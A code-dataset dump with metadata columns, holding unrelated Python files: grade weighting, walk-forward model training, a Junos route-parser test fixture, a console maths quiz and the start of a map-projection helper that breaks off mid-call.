hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1091dc613a4b1ba2a0d7987a53756d6b820a4250
| 2,257
|
py
|
Python
|
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
def top_grades_series(s_dict, series, credits, w):
    """Set the weight of the top-graded courses, up to `credits` units,
    within the given `series` to `w`.  Mutates and returns `s_dict`.

    A course that only partially fits the remaining credit budget gets a
    pro-rated weight: the covered units count at `w`, the excess units
    at `w * 0.1`.
    """
    # Remember which series each course came from, and gather all
    # (name, info) pairs from the requested series.
    name_to_series = {}
    candidates = []
    for series_key in series:
        for course_name, info in s_dict[series_key].items():
            name_to_series[course_name] = series_key
            candidates.append((course_name, info))
    # Best grades first.
    candidates.sort(key=lambda item: item[1]["point"], reverse=True)
    remaining = credits
    for course_name, info in candidates:
        if remaining <= 0:
            break
        credit = info["credit"]
        if credit <= remaining:
            new_weight = w
        else:
            # Only part of this course fits the budget: blend full weight
            # for the covered units with 10% weight for the excess.
            new_weight = float((remaining * w + (credit - remaining) * w * 0.1) / credit)
        s_dict[name_to_series[course_name]][course_name]["weight"] = new_weight
        remaining -= credit
    return s_dict
def top_grades_name(s_dict, names, credits, w):
    """Set the weight of the top-graded courses, up to `credits` units,
    among the courses matched by `names` to `w`.  Mutates and returns
    `s_dict`.

    A course matches when its name is a substring of any entry of
    `names`.  A course that only partially fits the remaining credit
    budget gets a pro-rated weight (covered units at `w`, excess units
    at `w * 0.1`).
    """
    s_dict_name_series = {}
    array = []
    for s in s_dict.keys():
        for name in s_dict[s].keys():
            for n in names:
                if name in n:
                    s_dict_name_series[name] = s
                    array.append((name, s_dict[s][name]))
                    # BUG FIX: without this break, a course matching several
                    # entries of `names` was appended once per match and
                    # later processed repeatedly, deducting its credits
                    # more than once and corrupting its final weight.
                    break
    # Best grades first.
    array = sorted(array, key=lambda x: x[1]["point"], reverse=True)
    for name, info in array:
        if credits <= 0:
            break
        s = s_dict_name_series[name]
        credit = info["credit"]
        if credit <= credits:
            modified_weight = w
        else:
            # Partial fit: blend full weight for covered units with
            # 10% weight for the excess units.
            modified_weight = float((credits * w + (credit - credits) * w * 0.1) / credit)
        s_dict[s][name]["weight"] = modified_weight
        credits -= credit
    return s_dict
| 30.5
| 88
| 0.515286
| 252
| 2,257
| 4.444444
| 0.190476
| 0.075893
| 0.048214
| 0.080357
| 0.846429
| 0.846429
| 0.846429
| 0.846429
| 0.794643
| 0.794643
| 0
| 0.008541
| 0.377492
| 2,257
| 74
| 89
| 30.5
| 0.788612
| 0.146212
| 0
| 0.826087
| 0
| 0
| 0.017745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52f4038429d70f3082fa0facf8c687c160a1642a
| 10,806
|
py
|
Python
|
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.8
import numpy as np
import pandas as pd
from tqdm import tqdm
from cl_features_importances import FeatureImportances
class WindowTrainingSpec:
    """
    relevant to use WindowTrainingSpec instead WindowTraining if labels are computed with cl_labelling.Labelling.

    Walk-forward trainer: every `refit_fqz` rows the model is (re)fitted on a
    window of `size_window` rows, shifted back by a lag derived from
    `index_knowledge` so that rows whose labels are not yet knowable at
    prediction time are kept out of the training set (see `_compute_lag`).
    """

    def __init__(self, size_window, refit_fqz):
        # Validate both hyper-parameters eagerly so misuse fails at
        # construction time rather than deep inside fit_predict.
        if isinstance(size_window, int):
            if size_window > 1:
                self.size_window = size_window
            else:
                raise ValueError("parameter size_window must be greater than 1.")
        else:
            raise TypeError(f"expected type int for size_window parameter, get {type(size_window)} instead.")
        if isinstance(refit_fqz, int):
            if refit_fqz > 0:
                self.refit_fqz = refit_fqz
            else:
                raise ValueError("parameter refit_fqz must be greater than 0.")
        else:
            raise TypeError(f"expected type int for refit_fqz parameter, get {type(refit_fqz)} instead.")

    def _compute_lag(self, idx, index_knowledge):
        """Return the smallest lag such that every row of the candidate
        window ending at ``idx - lag`` has its knowledge index <= idx."""
        for lag in range(1, idx, 1):
            b_inf = max(0, idx - lag - self.size_window)
            vector = index_knowledge[b_inf:(idx-lag)]
            # NOTE(review): the bound is `idx`, not `idx - lag` — presumably
            # "label known by prediction time idx"; confirm against
            # cl_labelling.Labelling's index semantics.
            if np.max(vector) <= idx:
                break
        return lag

    def fit_predict(self, model, X, y, index_knowledge, sample_weight=None, fit_or_refit="fit", predict_proba=True, accumulate_window=False,
                    get_feat_imp=False):
        """
        1 - fit (or refit) a model on last n data,
        2 - predict until next fitting
        3 - fit (or refit) a model on last n data
        4 - ...
        Parameters
        ----------
        model : supported model
            must have a .fit method
        X : pandas.DataFrame
            features
        y : numpy.ndarray
            labels
        index_knowledge : numpy.ndarray
            at what time label can be guess
        sample_weight : numpy.ndarray, optional
            vector of weights for each row, by default None means equal for each rows.
        fit_or_refit : str, optional
            fit if next predictions will be make with a new model or refit if next predictions will be make with the same model fitted
            on new data, by default "fit".
        predict_proba : bool, optional
            by default True
        accumulate_window : bool, optional
            new data = old_data + new_data ? or new_data = new_data, by default False
        get_feat_imp : bool, optional
            provide dict of features importances (sum of abs(importances) of each model), by default False
        Returns
        -------
        pandas.DataFrame or pandas.DataFrame and dict (if get_feat_imp == True)
            predictions
        Raises
        ------
        ValueError
            fit_or_refit != 'fit' or 'refit'.
        """
        if get_feat_imp:
            # Accumulates |importance| summed over every fitted model.
            dic_imp = {}
        # One prediction row per sample after the initial warm-up window;
        # two columns when class probabilities are requested.
        if predict_proba:
            preds = np.empty(shape=(len(X)-self.size_window, 2), dtype=np.float64)
        else:
            preds = np.empty(shape=len(X)-self.size_window, dtype=np.float64)
        if sample_weight is None:
            # Default: every row weighted equally.
            sample_weight = np.ones(shape=len(X), dtype=np.uint64)
        for i, j in enumerate(tqdm(range(self.size_window, len(X), self.refit_fqz))):
            # Shift the training window back so no training label depends on
            # information from the prediction period.
            lag = self._compute_lag(j, index_knowledge)
            if fit_or_refit == "fit":
                # "fit": restart from the supplied model every period.
                model_unfit = model
                if accumulate_window:
                    # Train on everything seen so far (expanding window).
                    model_fitted = model_unfit.fit(
                        X[:(j-lag)],
                        y[:(j-lag)],
                        sample_weight[:(j-lag)]
                    )
                else:
                    # Train on the last size_window rows only (sliding window).
                    b_inf = max(0, j - lag - self.size_window)
                    model_fitted = model_unfit.fit(
                        X[b_inf:(j-lag)],
                        y[b_inf:(j-lag)],
                        sample_weight[b_inf:(j-lag)]
                    )
            elif fit_or_refit == "refit":
                # "refit": keep fitting the same model object on new data.
                if i == 0:
                    model_fitted = model
                if accumulate_window:
                    model_fitted = model_fitted.fit(
                        X[:(j-lag)],
                        y[:(j-lag)],
                        sample_weight[:(j-lag)]
                    )
                else:
                    b_inf = max(0, j - lag - self.size_window)
                    model_fitted = model_fitted.fit(
                        X[b_inf:(j-lag)],
                        y[b_inf:(j-lag)],
                        sample_weight[b_inf:(j-lag)]
                    )
            else:
                raise ValueError("parameter fit_or_refit must be 'fit' or 'refit'.")
            # Slot in `preds` covered by this refit period.
            start = i*self.refit_fqz
            stop = self.refit_fqz + i*self.refit_fqz
            if get_feat_imp:
                dic_imp_tmp = FeatureImportances.compute(model_fitted, X.columns.tolist(), reverse=False, mode_abs=True)
                if dic_imp:
                    dic_imp = FeatureImportances.accumulate_dic_imp(dic_imp, dic_imp_tmp)
                else:
                    dic_imp = dic_imp_tmp
            # Predict the rows between this fit and the next one.
            if predict_proba:
                preds[start:stop, :] = model_fitted.predict_proba(X[j:j+self.refit_fqz])
            else:
                preds[start:stop] = model_fitted.predict(X[j:j+self.refit_fqz])
        # Re-attach the original index, skipping the warm-up window.
        preds = pd.DataFrame(preds, index=X.index[self.size_window:])
        if get_feat_imp:
            dic_imp = dict(sorted(dic_imp.items(), key=lambda x: x[1], reverse=True)) # sort by values
            return preds, dic_imp
        else:
            return preds
class WindowTraining:
    """Walk-forward trainer without label-knowledge purging: every
    `refit_fqz` rows the model is (re)fitted on the last `size_window`
    rows (or on all past rows when accumulate_window=True) and then used
    to predict the next `refit_fqz` rows.

    Use WindowTrainingSpec instead when labels are computed with
    cl_labelling.Labelling (it purges look-ahead rows from the window).
    """

    def __init__(self, size_window, refit_fqz):
        # Validate both hyper-parameters eagerly so misuse fails at
        # construction time rather than deep inside fit_predict.
        if isinstance(size_window, int):
            if size_window > 1:
                self.size_window = size_window
            else:
                raise ValueError("parameter size_window must be greater than 1.")
        else:
            raise TypeError(f"expected type int for size_window parameter, get {type(size_window)} instead.")
        if isinstance(refit_fqz, int):
            if refit_fqz > 0:
                self.refit_fqz = refit_fqz
            else:
                raise ValueError("parameter refit_fqz must be greater than 0.")
        else:
            raise TypeError(f"expected type int for refit_fqz parameter, get {type(refit_fqz)} instead.")

    def fit_predict(self, model, X, y, sample_weight=None, fit_or_refit="fit", predict_proba=True, accumulate_window=False,
                    get_feat_imp=False):
        """
        1 - fit (or refit) a model on last n data,
        2 - predict until next fitting
        3 - fit (or refit) a model on last n data
        4 - ...
        Parameters
        ----------
        model : supported model
            must have a .fit method
        X : pandas.DataFrame
            features
        y : numpy.ndarray
            labels
        sample_weight : numpy.ndarray, optional
            vector of weights for each row, by default None means equal for each rows.
        fit_or_refit : str, optional
            fit if next predictions will be make with a new model or refit if next predictions will be make with the same model fitted
            on new data, by default "fit".
        predict_proba : bool, optional
            by default True
        accumulate_window : bool, optional
            new data = old_data + new_data ? or new_data = new_data, by default False
        get_feat_imp : bool, optional
            provide dict of features importances (sum of abs(importances) of each model), by default False
        Returns
        -------
        pandas.DataFrame or pandas.DataFrame and dict (if get_feat_imp == True)
            predictions
        Raises
        ------
        ValueError
            fit_or_refit != 'fit' or 'refit'.
        """
        if get_feat_imp:
            # Accumulates |importance| summed over every fitted model.
            dic_imp = {}
        # One prediction row per sample after the initial warm-up window;
        # two columns when class probabilities are requested.
        if predict_proba:
            preds = np.empty(shape=(len(X)-self.size_window, 2), dtype=np.float64)
        else:
            preds = np.empty(shape=len(X)-self.size_window, dtype=np.float64)
        if sample_weight is None:
            # Default: every row weighted equally.
            sample_weight = np.ones(shape=len(X), dtype=np.uint64)
        for i, j in enumerate(tqdm(range(self.size_window, len(X), self.refit_fqz))):
            if fit_or_refit == "fit":
                # "fit": restart from the supplied model every period.
                model_unfit = model
                if accumulate_window:
                    # Train on everything seen so far (expanding window).
                    model_fitted = model_unfit.fit(
                        X[:j],
                        y[:j],
                        sample_weight[:j]
                    )
                else:
                    # Train on the last size_window rows only (sliding window).
                    model_fitted = model_unfit.fit(
                        X[j-self.size_window:j],
                        y[j-self.size_window:j],
                        sample_weight[j-self.size_window:j]
                    )
            elif fit_or_refit == "refit":
                # "refit": keep fitting the same model object on new data.
                if i == 0:
                    model_fitted = model
                if accumulate_window:
                    model_fitted = model_fitted.fit(
                        X[:j],
                        y[:j],
                        sample_weight[:j]
                    )
                else:
                    model_fitted = model_fitted.fit(
                        X[j-self.size_window:j],
                        y[j-self.size_window:j],
                        sample_weight[j-self.size_window:j]
                    )
            else:
                raise ValueError("parameter fit_or_refit must be 'fit' or 'refit'.")
            # Slot in `preds` covered by this refit period.
            start = i*self.refit_fqz
            stop = self.refit_fqz + i*self.refit_fqz
            if get_feat_imp:
                dic_imp_tmp = FeatureImportances.compute(model_fitted, X.columns.tolist(), reverse=False, mode_abs=True)
                if dic_imp:
                    dic_imp = FeatureImportances.accumulate_dic_imp(dic_imp, dic_imp_tmp)
                else:
                    dic_imp = dic_imp_tmp
            # Predict the rows between this fit and the next one.
            if predict_proba:
                preds[start:stop, :] = model_fitted.predict_proba(X[j:j+self.refit_fqz])
            else:
                preds[start:stop] = model_fitted.predict(X[j:j+self.refit_fqz])
        # Re-attach the original index, skipping the warm-up window.
        preds = pd.DataFrame(preds, index=X.index[self.size_window:])
        if get_feat_imp:
            dic_imp = dict(sorted(dic_imp.items(), key=lambda x: x[1], reverse=True)) # sort by values
            return preds, dic_imp
        else:
            return preds
| 39.582418
| 140
| 0.514992
| 1,260
| 10,806
| 4.22381
| 0.126984
| 0.062007
| 0.055242
| 0.018038
| 0.909245
| 0.909245
| 0.909245
| 0.896655
| 0.896655
| 0.896655
| 0
| 0.006336
| 0.401166
| 10,806
| 272
| 141
| 39.727941
| 0.816103
| 0.211827
| 0
| 0.855422
| 0
| 0
| 0.074651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03012
| false
| 0
| 0.048193
| 0
| 0.120482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e35ed7baaf24d8bb0a2294e03a78cdd0dba6d82
| 6,938
|
py
|
Python
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
# Golden expected structure for the Junos
# "show route receive-protocol <protocol> <peer-address> extensive" CLI
# output (per this file's path), compared verbatim against the parser result.
expected_output = {
    "route-information": {
        "route-table": [
            {
                "active-route-count": "16",
                "destination-count": "16",
                "hidden-route-count": "0",
                "holddown-route-count": "0",
                "rt": [
                    {
                        "rt-announced-count": "1",
                        "rt-destination": "10.1.0.0",
                        "rt-entry": {
                            "as-path": "AS path: I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "2"},
                        "rt-prefix-length": "24",
                    },
                    {
                        "rt-announced-count": "1",
                        "rt-destination": "10.64.4.4",
                        "rt-entry": {
                            "as-path": "AS path: I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "2"},
                        "rt-prefix-length": "32",
                    },
                    {
                        "rt-announced-count": "1",
                        "rt-destination": "10.145.0.0",
                        "rt-entry": {
                            "as-path": "AS path: I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "2"},
                        "rt-prefix-length": "24",
                    },
                    {
                        "active-tag": "* ",
                        "rt-announced-count": "1",
                        "rt-destination": "192.168.220.0",
                        "rt-entry": {
                            "as-path": "AS path: I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "1"},
                        "rt-prefix-length": "24",
                    },
                    {
                        "active-tag": "* ",
                        "rt-announced-count": "1",
                        "rt-destination": "192.168.240.0",
                        "rt-entry": {
                            "as-path": "AS path: 200000 4 5 6 I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "200000 4 5 6 I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "1"},
                        "rt-prefix-length": "24",
                    },
                    {
                        "active-tag": "* ",
                        "rt-announced-count": "1",
                        "rt-destination": "192.168.205.0",
                        "rt-entry": {
                            "as-path": "AS path: 200000 4 7 8 I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "200000 4 7 8 I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "1"},
                        "rt-prefix-length": "24",
                    },
                    {
                        "active-tag": "* ",
                        "rt-announced-count": "1",
                        "rt-destination": "192.168.115.0",
                        "rt-entry": {
                            "as-path": "AS path: 200000 4 100000 8 I",
                            "bgp-path-attributes": {
                                "attr-as-path-effective": {
                                    "aspath-effective-string": "AS path:",
                                    "attr-value": "200000 4 100000 8 I",
                                }
                            },
                            "bgp-rt-flag": "Accepted",
                            "local-preference": "100",
                            "nh": {"to": "10.64.4.4"},
                        },
                        "rt-entry-count": {"#text": "1"},
                        "rt-prefix-length": "24",
                    },
                ],
                "table-name": "inet.0",
                "total-route-count": "19",
            },
            {
                "active-route-count": "18",
                "destination-count": "18",
                "hidden-route-count": "0",
                "holddown-route-count": "0",
                "table-name": "inet6.0",
                "total-route-count": "20",
            },
        ]
    }
}
| 44.76129
| 74
| 0.261603
| 463
| 6,938
| 3.917927
| 0.136069
| 0.092613
| 0.022051
| 0.026461
| 0.892503
| 0.892503
| 0.880375
| 0.827453
| 0.787762
| 0.743109
| 0
| 0.082828
| 0.596281
| 6,938
| 154
| 75
| 45.051948
| 0.564798
| 0
| 0
| 0.551948
| 0
| 0
| 0.300375
| 0.045402
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eaaa4789cc60f602e523c07bec99ee2e935994f9
| 11,708
|
py
|
Python
|
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
import random

# Running total of correct answers across rounds.
score = 0
print("Welecome to my fill in Maths quiz!")

# Operand range for each difficulty level.
_RANGES = {"easy": (1, 10), "medium": (1, 50), "hard": (1, 100)}


def _choose_subject():
    """Prompt until the user enters +, -, / or *; return the topic name."""
    symbol_to_subject = {
        "+": "Addition",
        "-": "Subtraction",
        "*": "Multiplication",
        "/": "Division",
    }
    while True:
        topic = input("please enter either +, -, / or * to choose the certain topic: ")
        if topic in symbol_to_subject:
            return symbol_to_subject[topic]
        print("Please enter a correct topic")


def _choose_difficulty():
    """Prompt until the user enters easy, medium or hard; return it lowercased."""
    while True:
        difficulty = input("Please enter your difficulty out of easy, medium or hard: ").lower()
        if difficulty in _RANGES:
            return difficulty
        print("Please enter a Difficulty")


def _ask_question(subject, low, high, score):
    """Ask one random `subject` question with operands in [low, high].

    Prints the verdict and the (possibly updated) score, and returns
    the new score.
    """
    a = random.randint(low, high)
    b = random.randint(low, high)
    if subject == "Addition":
        answer, symbol = a + b, " + "
    elif subject == "Subtraction":
        answer, symbol = a - b, " - "
    elif subject == "Multiplication":
        answer, symbol = a * b, " X "
    else:
        # Division keeps the original true-division semantics: an integer
        # guess can only match when the quotient is a whole number.
        answer, symbol = a / b, " Divided by "
    guess = int(input("What is " + str(a) + symbol + str(b) + ": "))
    if guess == answer:
        print("Answer is correct!")
        score = score + 1
    else:
        print("Answer is incorrect!")
    print(score)
    return score


PlayAgain = True
while PlayAgain:
    Subject = _choose_subject()
    Difficulty = _choose_difficulty()
    print("You have choosen " + Subject + " on " + Difficulty + " Difficulty")
    low, high = _RANGES[Difficulty]
    # One question per round.  The original copy-pasted this block once per
    # subject/difficulty pair, asked the medium-multiplication question
    # twice, and crashed on medium subtraction via a `hign` typo — all
    # fixed by the single parameterised helper above.
    score = _ask_question(Subject, low, high, score)
    PlayAgain = input("Do you want to play again?: ")
    if PlayAgain == "yes":
        PlayAgain = True
    elif PlayAgain == "no":
        PlayAgain = False
    else:
        break
| 39.026667
| 97
| 0.421165
| 1,035
| 11,708
| 4.758454
| 0.078261
| 0.068629
| 0.084467
| 0.101523
| 0.846294
| 0.827208
| 0.827208
| 0.820914
| 0.820914
| 0.820914
| 0
| 0.026567
| 0.472754
| 11,708
| 299
| 98
| 39.157191
| 0.771262
| 0.011104
| 0
| 0.857639
| 0
| 0
| 0.144695
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003472
| 0
| 0.003472
| 0.194444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eaaf5d912a6810d2c3bffe0c58abef9b546c2436
| 60,874
|
py
|
Python
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 6
|
2017-06-05T07:30:46.000Z
|
2022-03-07T00:47:22.000Z
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 1
|
2017-12-14T05:40:42.000Z
|
2017-12-14T05:40:42.000Z
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 1
|
2020-10-22T19:18:30.000Z
|
2020-10-22T19:18:30.000Z
|
# -*- coding: utf-8 -*-
import pickle
from utm import latitude_to_zone_letter, latlon_to_zone_number
def get_most_accurate_epsg(coordinates):
"""Gets the EPSG code for closest know area projection in meters. the pickle is prepared as a geopandas"""
gdf = pickle.loads(
